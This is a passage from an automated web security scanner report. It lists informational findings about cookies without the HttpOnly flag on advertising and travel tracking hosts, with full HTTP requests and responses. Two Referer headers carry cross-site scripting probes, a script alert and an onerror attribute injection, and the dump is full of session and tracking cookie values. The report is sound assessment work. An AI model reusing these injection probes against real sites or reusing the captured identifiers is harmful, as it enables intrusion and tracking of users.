Set-Cookie: WSS_GW=V1z%X%@Q^^XCC; path=/; domain=.hitbox.com; expires=Mon, 01-Oct-2012 23:49:05 GMT; max-age=31536000
Set-Cookie: DM55040895RDV6=V1^Q(#X"rz%X%@Q^^XCCr@rQXCz%zrz%"%X%@Q^^XCCz%X%@Q^^XCC"%X%@Q^^XCQ"%X%@Q^^XCCr@rQXC"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)O:ma6r"OuKr6%XzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:49:05 GMT; max-age=31536000
Set-Cookie: DM570806C8RAV6=V1@%(#X"rz%X%@Q^^XCCr@rQXCz%zrz%"%X%@Q^^XCCz%X%@Q^^XCC"%X%@Q^^XCQ"%X%@Q^^XCCr@rQXC"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:49:05 GMT; max-age=31536000
Set-Cookie: CTG=1317599345; path=/; domain=.hitbox.com; expires=Sun, 09-Oct-2011 23:49:05 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Sun, 02 Oct 2011 23:49:06 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.143. http://ehg-twi.hitbox.com/HGct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-twi.hitbox.com
Path:   /HGct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HGct?hc=&hb=DM55040895RD95EN3%3BDM570806C8RA71EN3&hec=1&vjs=HBX0201.03u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-twi.hitbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: WSS_GW=V1z%X%eCer@ir; CTG=1317599837

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:19 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: WSS_GW=V1z%X%@Q^^iXi; path=/; domain=.hitbox.com; expires=Mon, 01-Oct-2012 23:57:19 GMT; max-age=31536000
Set-Cookie: DM55040895RDV6=V1^Q(#X"rz%X%@Q^^iXieXr^%rz%zrz%"%X%@Q^^iXiz%X%@Q^^iXi"%X%@Q^^iX^"%X%@Q^^iXieXr^%r"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)O:ma6r"OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:57:19 GMT; max-age=31536000
Set-Cookie: DM570806C8RAV6=V1@%(#X"rz%X%@Q^^iXieXr^%rz%zrz%"%X%@Q^^iXiz%X%@Q^^iXi"%X%@Q^^iX^"%X%@Q^^iXieXr^%r"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:57:19 GMT; max-age=31536000
Set-Cookie: CTG=1317599839; path=/; domain=.hitbox.com; expires=Sun, 09-Oct-2011 23:57:19 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Sun, 02 Oct 2011 23:57:20 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.144. http://extras.expedia.com/Hotels/Delivery/HSDirect.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://extras.expedia.com
Path:   /Hotels/Delivery/HSDirect.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotels/Delivery/HSDirect.aspx?thrn=1299437744&D=BOS&CI=20111004&CO=20111007&Eapid=0000&SID=1&RID=178239&pr=1&pa=1&Cr=&H=4215|15861|23415|1680030|2800816|4443|1450057|12244|17845|16067|15159|10391|560932|22961|20351|16680|903185|151201|16079|293|119162|980972|26283|2311712|22512&LAP=429.0|339.15|289.0|432.33|308.54|383.1|359.1|349.0|401.33|412.33|409.4|259.0|221.1|345.67|72.1|349.0|414.0|379.95|359.0|127.99|436.33|419.0|335.67|445.67|399.0&LTP=1287.00|1017.45|867.00|1297.00|925.60|1149.30|1077.30|1047.00|1204.00|1237.00|1228.21|777.00|663.30|1037.00|216.30|1047.00|1242.00|1139.85|1077.00|383.97|1309.00|1257.00|1007.00|1337.00|1197.00&HAP=449.00|509.15|289.00|432.33|388.54|401.10|407.33|399.00|437.33|462.33|429.91|259.00|221.10|345.67|72.10|349.00|614.00|429.95|389.00|159.99|436.33|419.00|335.67|525.67|459.00&HTP=1347.00|1527.45|867.00|1297.00|1165.60|1203.30|1222.00|1197.00|1312.00|1387.00|1289.74|777.00|663.30|1037.00|216.30|1047.00|1842.00|1289.85|1167.00|479.97|1309.00|1257.00|1007.00|1577.00|1377.00&Str=0&Si=0&vers=en&tid=1 HTTP/1.1
Host: extras.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=CT-1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: UID=1961758836|0|0; expires=Tue, 02-Oct-2012 00:10:59 GMT; path=/
Set-Cookie: expEAPID=0000; expires=Tue, 04-Oct-2011 00:10:59 GMT; path=/
Set-Cookie: hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDd5GFAnVqxZzRrIR6V8ksXrB+9RBTwy9+8cmuXkhnPx+FyF0r62+n6+GSuRa5+4ueCc+QkR1NB55VmEBCpjt+n/TvuY5xf9pFNiHIfvnm5NePpvDE+GrsXQEJKvNqFlYSaQW+re/5/GQH2seBJxXACZ7631o5Ado1kVl48f7csfT3c6loQl0QaGr+exqsZE8q6RN0qJ9Kmc82VZVBumioxbKldNopV86WTUYH0n5v3Toyx0+FBPR+W9VyVapTaQWQlqvxPP7vS71A=; expires=Thu, 02-Oct-2014 00:10:59 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Mon, 03 Oct 2011 00:10:59 GMT
Connection: close

var gem3442live=document.getElementById("th_fee");var th_StaticStart=new Date();var th_StaticEnd=new Date();var th_ScrapeStart=new Date();var th_ScrapeEnd=new Date();var th_ScriptCounter=1;var th_QS=d
...[SNIP]...

14.145. http://extras.expedia.com/Hotels/Delivery/ISDirect.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://extras.expedia.com
Path:   /Hotels/Delivery/ISDirect.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotels/Delivery/ISDirect.aspx?thrn=749140340&Path=HOT&HN=The%20Boston%20Park%20Plaza%20Hotel%20%26%20Towers&HID=4215&SV=35&pr=1&CI=20111004&CO=20111007&pa=1&pc=0&ca=&RN=*Plaza%20Petite|*Standard%201%20King|*Standard%201%20Queen|*Standard%20-%202%20Doubles|*Deluxe%20room%20-%201%20King|*Towers%20Concierge%20Level|*Junior%20Suite|*One%20Bedroom%20Suite|XXXXDeluxe%20room%20for%204&AP=429|449|449|449|459|479|509|539|&P=1464.24|1532.49|1532.49|1532.49|1566.63|1634.88|1737.27|1839.67|&drid=800016&vers=en_US&sid=1&tpid=1&eapid=0000 HTTP/1.1
Host: extras.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; UID=1961758836|0|0; expEAPID=0000; hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDd5GFAnVqxZzRrIR6V8ksXrB+9RBTwy9+8cmuXkhnPx+FyF0r62+n6+GSuRa5+4ueCc+QkR1NB55VmEBCpjt+n/TvuY5xf9pFNiHIfvnm5NePpvDE+GrsXQEJKvNqFlYSaQW+re/5/GQGfVDKyCDiLasL8etBXg4B54nFRYvqc8iEB0kzgXkvRpa4L0iza1xMJ5At9D9dKY+grPbSn0rU0CnQWUDm8aBkJovZzrkPbHrkYByqd2H1JuSrHF+eWCtZQlMXo5rYyQxc=; hl_ubm=YDnUkiZb5XknMSm4p9+V5cZHCQxkEJ6V6VqmAnOws77jT09l7gstFUSTh3JtzITB; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: UID=1961758836|0|0; expires=Tue, 02-Oct-2012 00:14:21 GMT; path=/
Set-Cookie: hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDd5GFAnVqxZzRrIR6V8ksXrB+9RBTwy9+8cmuXkhnPx+FyF0r62+n6+OJVqE4d+vQFR8Ixpw0P5zmc6pxFtvXIc/qSb3VqRp1c5BGcsYrAdS3R5hmjeEGy+avm745VV7Cb76SeNa7T182quMzGEhkg18QQ3xFN/+jLYs+3i/jbPaF53+0nEdIRAazOIls9BR8Za2NApYCsP++rHkH+zOkoki5QOmwb5o//LhY/sOM+iALIai9w+nCppg/LkJdLONuU8vEW+S+/3O18rMvBLxepUR3keCc8j0PtXh7F4QANSI5ssc9aE4adnNlpQ6jojPmc9ovtSYWyrDoNUW/i7FJjiiOCJt0DP1MXbhnsCvgIxtUBdhnYhBYqLNPKlrRNC3sjwKPSiQ5Xuvs=; expires=Thu, 02-Oct-2014 00:14:21 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Mon, 03 Oct 2011 00:14:21 GMT
Connection: close

var THSearch = 3028489027;var thSiteId = 1;
if(typeof th_domain=="undefined"){th_domain="extras.expedia.com"}var thProt=(window.location.protocol=="http:")?"http":"https";var thCoTxt={code:"UK",inlin
...[SNIP]...

14.146. http://ff.connextra.com/BlueSquare/selector/client

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ff.connextra.com
Path:   /BlueSquare/selector/client

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BlueSquare/selector/client?client=BlueSquare&placement=Guardian_300x312_Football_Premiership HTTP/1.1
Host: ff.connextra.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Served-By: vm-pcxtad05.gs1.betgenius.com
P3P: CP=NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR SAMa BUS IND UNI PUR COM NAV
Location: http://ff.connextra.com/servlet/controller?service=Guardian_300x312_Football_Premiership_v2&client=BlueSquare&placement=Guardian_300x312_Football_Premiership
Content-Length: 0
Expires: Sun, 02 Oct 2011 23:50:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:50:54 GMT
Connection: close
Set-Cookie: FrequencyCappingCookie=; Domain=.connextra.com; Expires=Mon, 01-Oct-2012 23:50:54 GMT; Path=/BlueSquare
Set-Cookie: BlueSquare=A%7Cpostimpression%7C1%7C201110030050%7C7%7CGuardian_300x312_Football_Premiership%7CGuardian_300x312_Football_Premiership_v2%7C; Domain=.connextra.com; Expires=Mon, 01-Oct-2012 23:50:54 GMT; Path=/


14.147. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/985248306/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/985248306/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/viewthroughconversion/985248306/?label=M6MLCJbtiQIQsuTm1QM5a299 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://www.agoda.com/pages/agoda/default/page_AdScript.aspx?type=R&pagetypeid=1&conversionID=985248306&conversionLabel=M6MLCJbtiQIQsuTm1QM5a299"onerror%3d"alert(1)"d0370ac32b&_=1317602266727
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 03 Oct 2011 00:55:57 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: test_cookie=CheckForPermission; expires=Mon, 03-Oct-2011 01:10:57 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

14.148. http://i.w55c.net/ping_match.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /ping_match.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?ei=OPENX&rurl=http%3A%2F%2Fr.openx.net%2Fset%3Fpid%3D6f983c5f-b90f-c87c-2ba9-c74bb1f0f9ed%26rtb%3D_wfivefivec_ HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; optout=1; matchpubmatic=1; matchcontextweb=1; matchadbrite=1; matchyahoo=1; matchgoogle=1; matchopenx=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 302 Found
Date: Sun, 02 Oct 2011 23:54:02 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Tue, 01-Oct-13 23:54:02 GMT
X-Version: DataXu Pixel Tracker v3
Cache-Control: private
Content-Length: 0
Location: http://r.openx.net/set?pid=6f983c5f-b90f-c87c-2ba9-c74bb1f0f9ed&rtb=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F
Via: 1.1 mdw061001 (MII-APC/2.1)
Content-Type: text/plain


14.149. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9MjE5MSZ0bD0yNTkyMDA=&piggybackCookie=-5675633421699857517= HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26620&s=26621
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; PUBMDCID=1; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; PMDTSHR=cat:; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; DPPIX_ON=YES

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:52:56 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_218=4056--5675633421699857517=; domain=pubmatic.com; expires=Wed, 02-Oct-2013 01:52:56 GMT; path=/
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html


14.150. http://images.hotelplanner.com/hotelimages/s/028000/028920A-thumb.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.hotelplanner.com
Path:   /hotelimages/s/028000/028920A-thumb.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotelimages/s/028000/028920A-thumb.jpg HTTP/1.1
Host: images.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:20 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: TLTSID=F123A950ED5310ED160FDD8181683406; Path=/; Domain=.hotelplanner.com
Set-Cookie: TLTUID=F123A950ED5310ED160FDD8181683406; Path=/; Domain=.hotelplanner.com; Expires=Mon, 03-10-2021 00:09:20 GMT
HostName: TWEB10
Last-Modified: Fri, 23 Sep 2011 05:06:00 GMT
ETag: "857-c3e25e00"
Accept-Ranges: bytes
Content-Length: 2135
Content-Type: image/jpeg

......JFIF.....H.H.....C...............
.

       
...............%...#... , #&')*)..-0-(0%()(...C....
.
.

.(...((((((((((((((((((((((((((((((((((((((((((((((((((......F.F.."..............................
...[SNIP]...

14.151. http://imgwww.priceline.com/dcscx5l599uewfk6c3m90kij8_6z6b/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imgwww.priceline.com
Path:   /dcscx5l599uewfk6c3m90kij8_6z6b/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcscx5l599uewfk6c3m90kij8_6z6b/dcs.gif?&dcsdat=1317600550243&dcssip=www.priceline.com&dcsuri=/qp_landing.apn&dcsqry=%3FProductID=5R%26refid=PLIGOUGO%26refclickid=HOTELSEARCH%26City=Boston,United%20States%26Rooms=1%26CheckInDate=10/04/11%26CheckOutDate=10/07/11&dcsref=http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf%3Flob=HOTEL%26advertiserName=priceline%26grp=9706%26placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder%26url=http%3A%2F%2Fwww.priceline.com%2FQP.asp%3FProductID%3D5R%26refid%3DPLIGOUGO%26refclickid%3DHOTELSEARCH%26City%3D%24%7Bcity%7D%2C%24%7Bcountryn%7D%26Rooms%3D%24%7Brooms%7D%26CheckInDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26CheckOutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26pid=c3919e40-e5b8-49f8-b876-4fed1f31968f%26sid=bfa7dd53-c988-458c-86df-52443affccb8%26uid=20d9c1fc-61a4-45f0-9524-380e68994c01%26widget=H_PopUnder%26pti=default%26src=none%26ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75%26ctx=92aa9504-b6eb-4091-8b93-6582f63d9555%26ccn=1%26cgn=154%26pos=1%26aii=d1125990-8f30-4f2a-83dc-0b115fb728a1%26%24cc=US%26%24rc=US%26%24adults=1%26%24destination=Boston%2C%20MA%20Massachusetts%26%24glsId=440663%26%24city=Boston%26%24countryn=United%20States%26%24countryc=US%26%24staten=Massachusetts%26%24statec=MA%26%24lob=HOTEL%26%24rooms=1%26%24context=92aa9504-b6eb-4091-8b93-6582f63d9555%26%24widget=H_PopUnder%26%24l=9%26%24departureDate=2011-10-04%26%24returnDate=2011-10-07%26%24aucnt=0%26%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f%26%24sid=bfa7dd53-c988-458c-86df-52443affccb8%26adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a%26&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.js=Yes&WT.jv=1.5&WT.bs=700x700&WT.fi=Yes&WT.fv=10.3&WT.sp=@@&WT.co_f=2681d53fc9a0a3b6dd31317600550352&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_sid=2681d53fc9a0a3b6dd31317600550352.1317600550352&WT.sv=A&WT.cg_n=16&WT.z_pt_cd=PCLN&WT.z_plf_cd=PCLN&WT.z_p_pt_cd=PCLN&WT.ti=/qp_landing&WT.mc_id=PLIGOUGO&WT.z_ref=PLIGOUGO&WT.mc_ev=HOTELSEARCH&WT.z_rc=HOTELSEARCH&WT.z_vid=v2011100300090989417126&DCSext.plf_cd=PCLN HTTP/1.1
Host: imgwww.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Mon, 28 Jan 2002 14:51:42 GMT
Accept-Ranges: bytes
ETag: "013394cba8c11:60d"
Server: Microsoft-IIS/6.0
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMjkyODYxNDcyMC4zMDE3OTY4MAAAAAAAAAABAAAAAgAAAFb9iE4q/YhOAQAAAAEAAABW/YhOKv2ITgEAAAACAAAAITUwLjIzLjEyMy4xMDYtMjkyODYxNDcyMC4zMDE3OTY4MA--; path=/; expires=Thu, 30-Sep-2021 00:09:58 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Mon, 03 Oct 2011 00:09:57 GMT
Connection: close

GIF89a.............!.......,...........D..;

14.152. http://int.teracent.net/tase/int

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/int?adv=270&fmt=html&sec=0&pid=search&dest=1643195 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
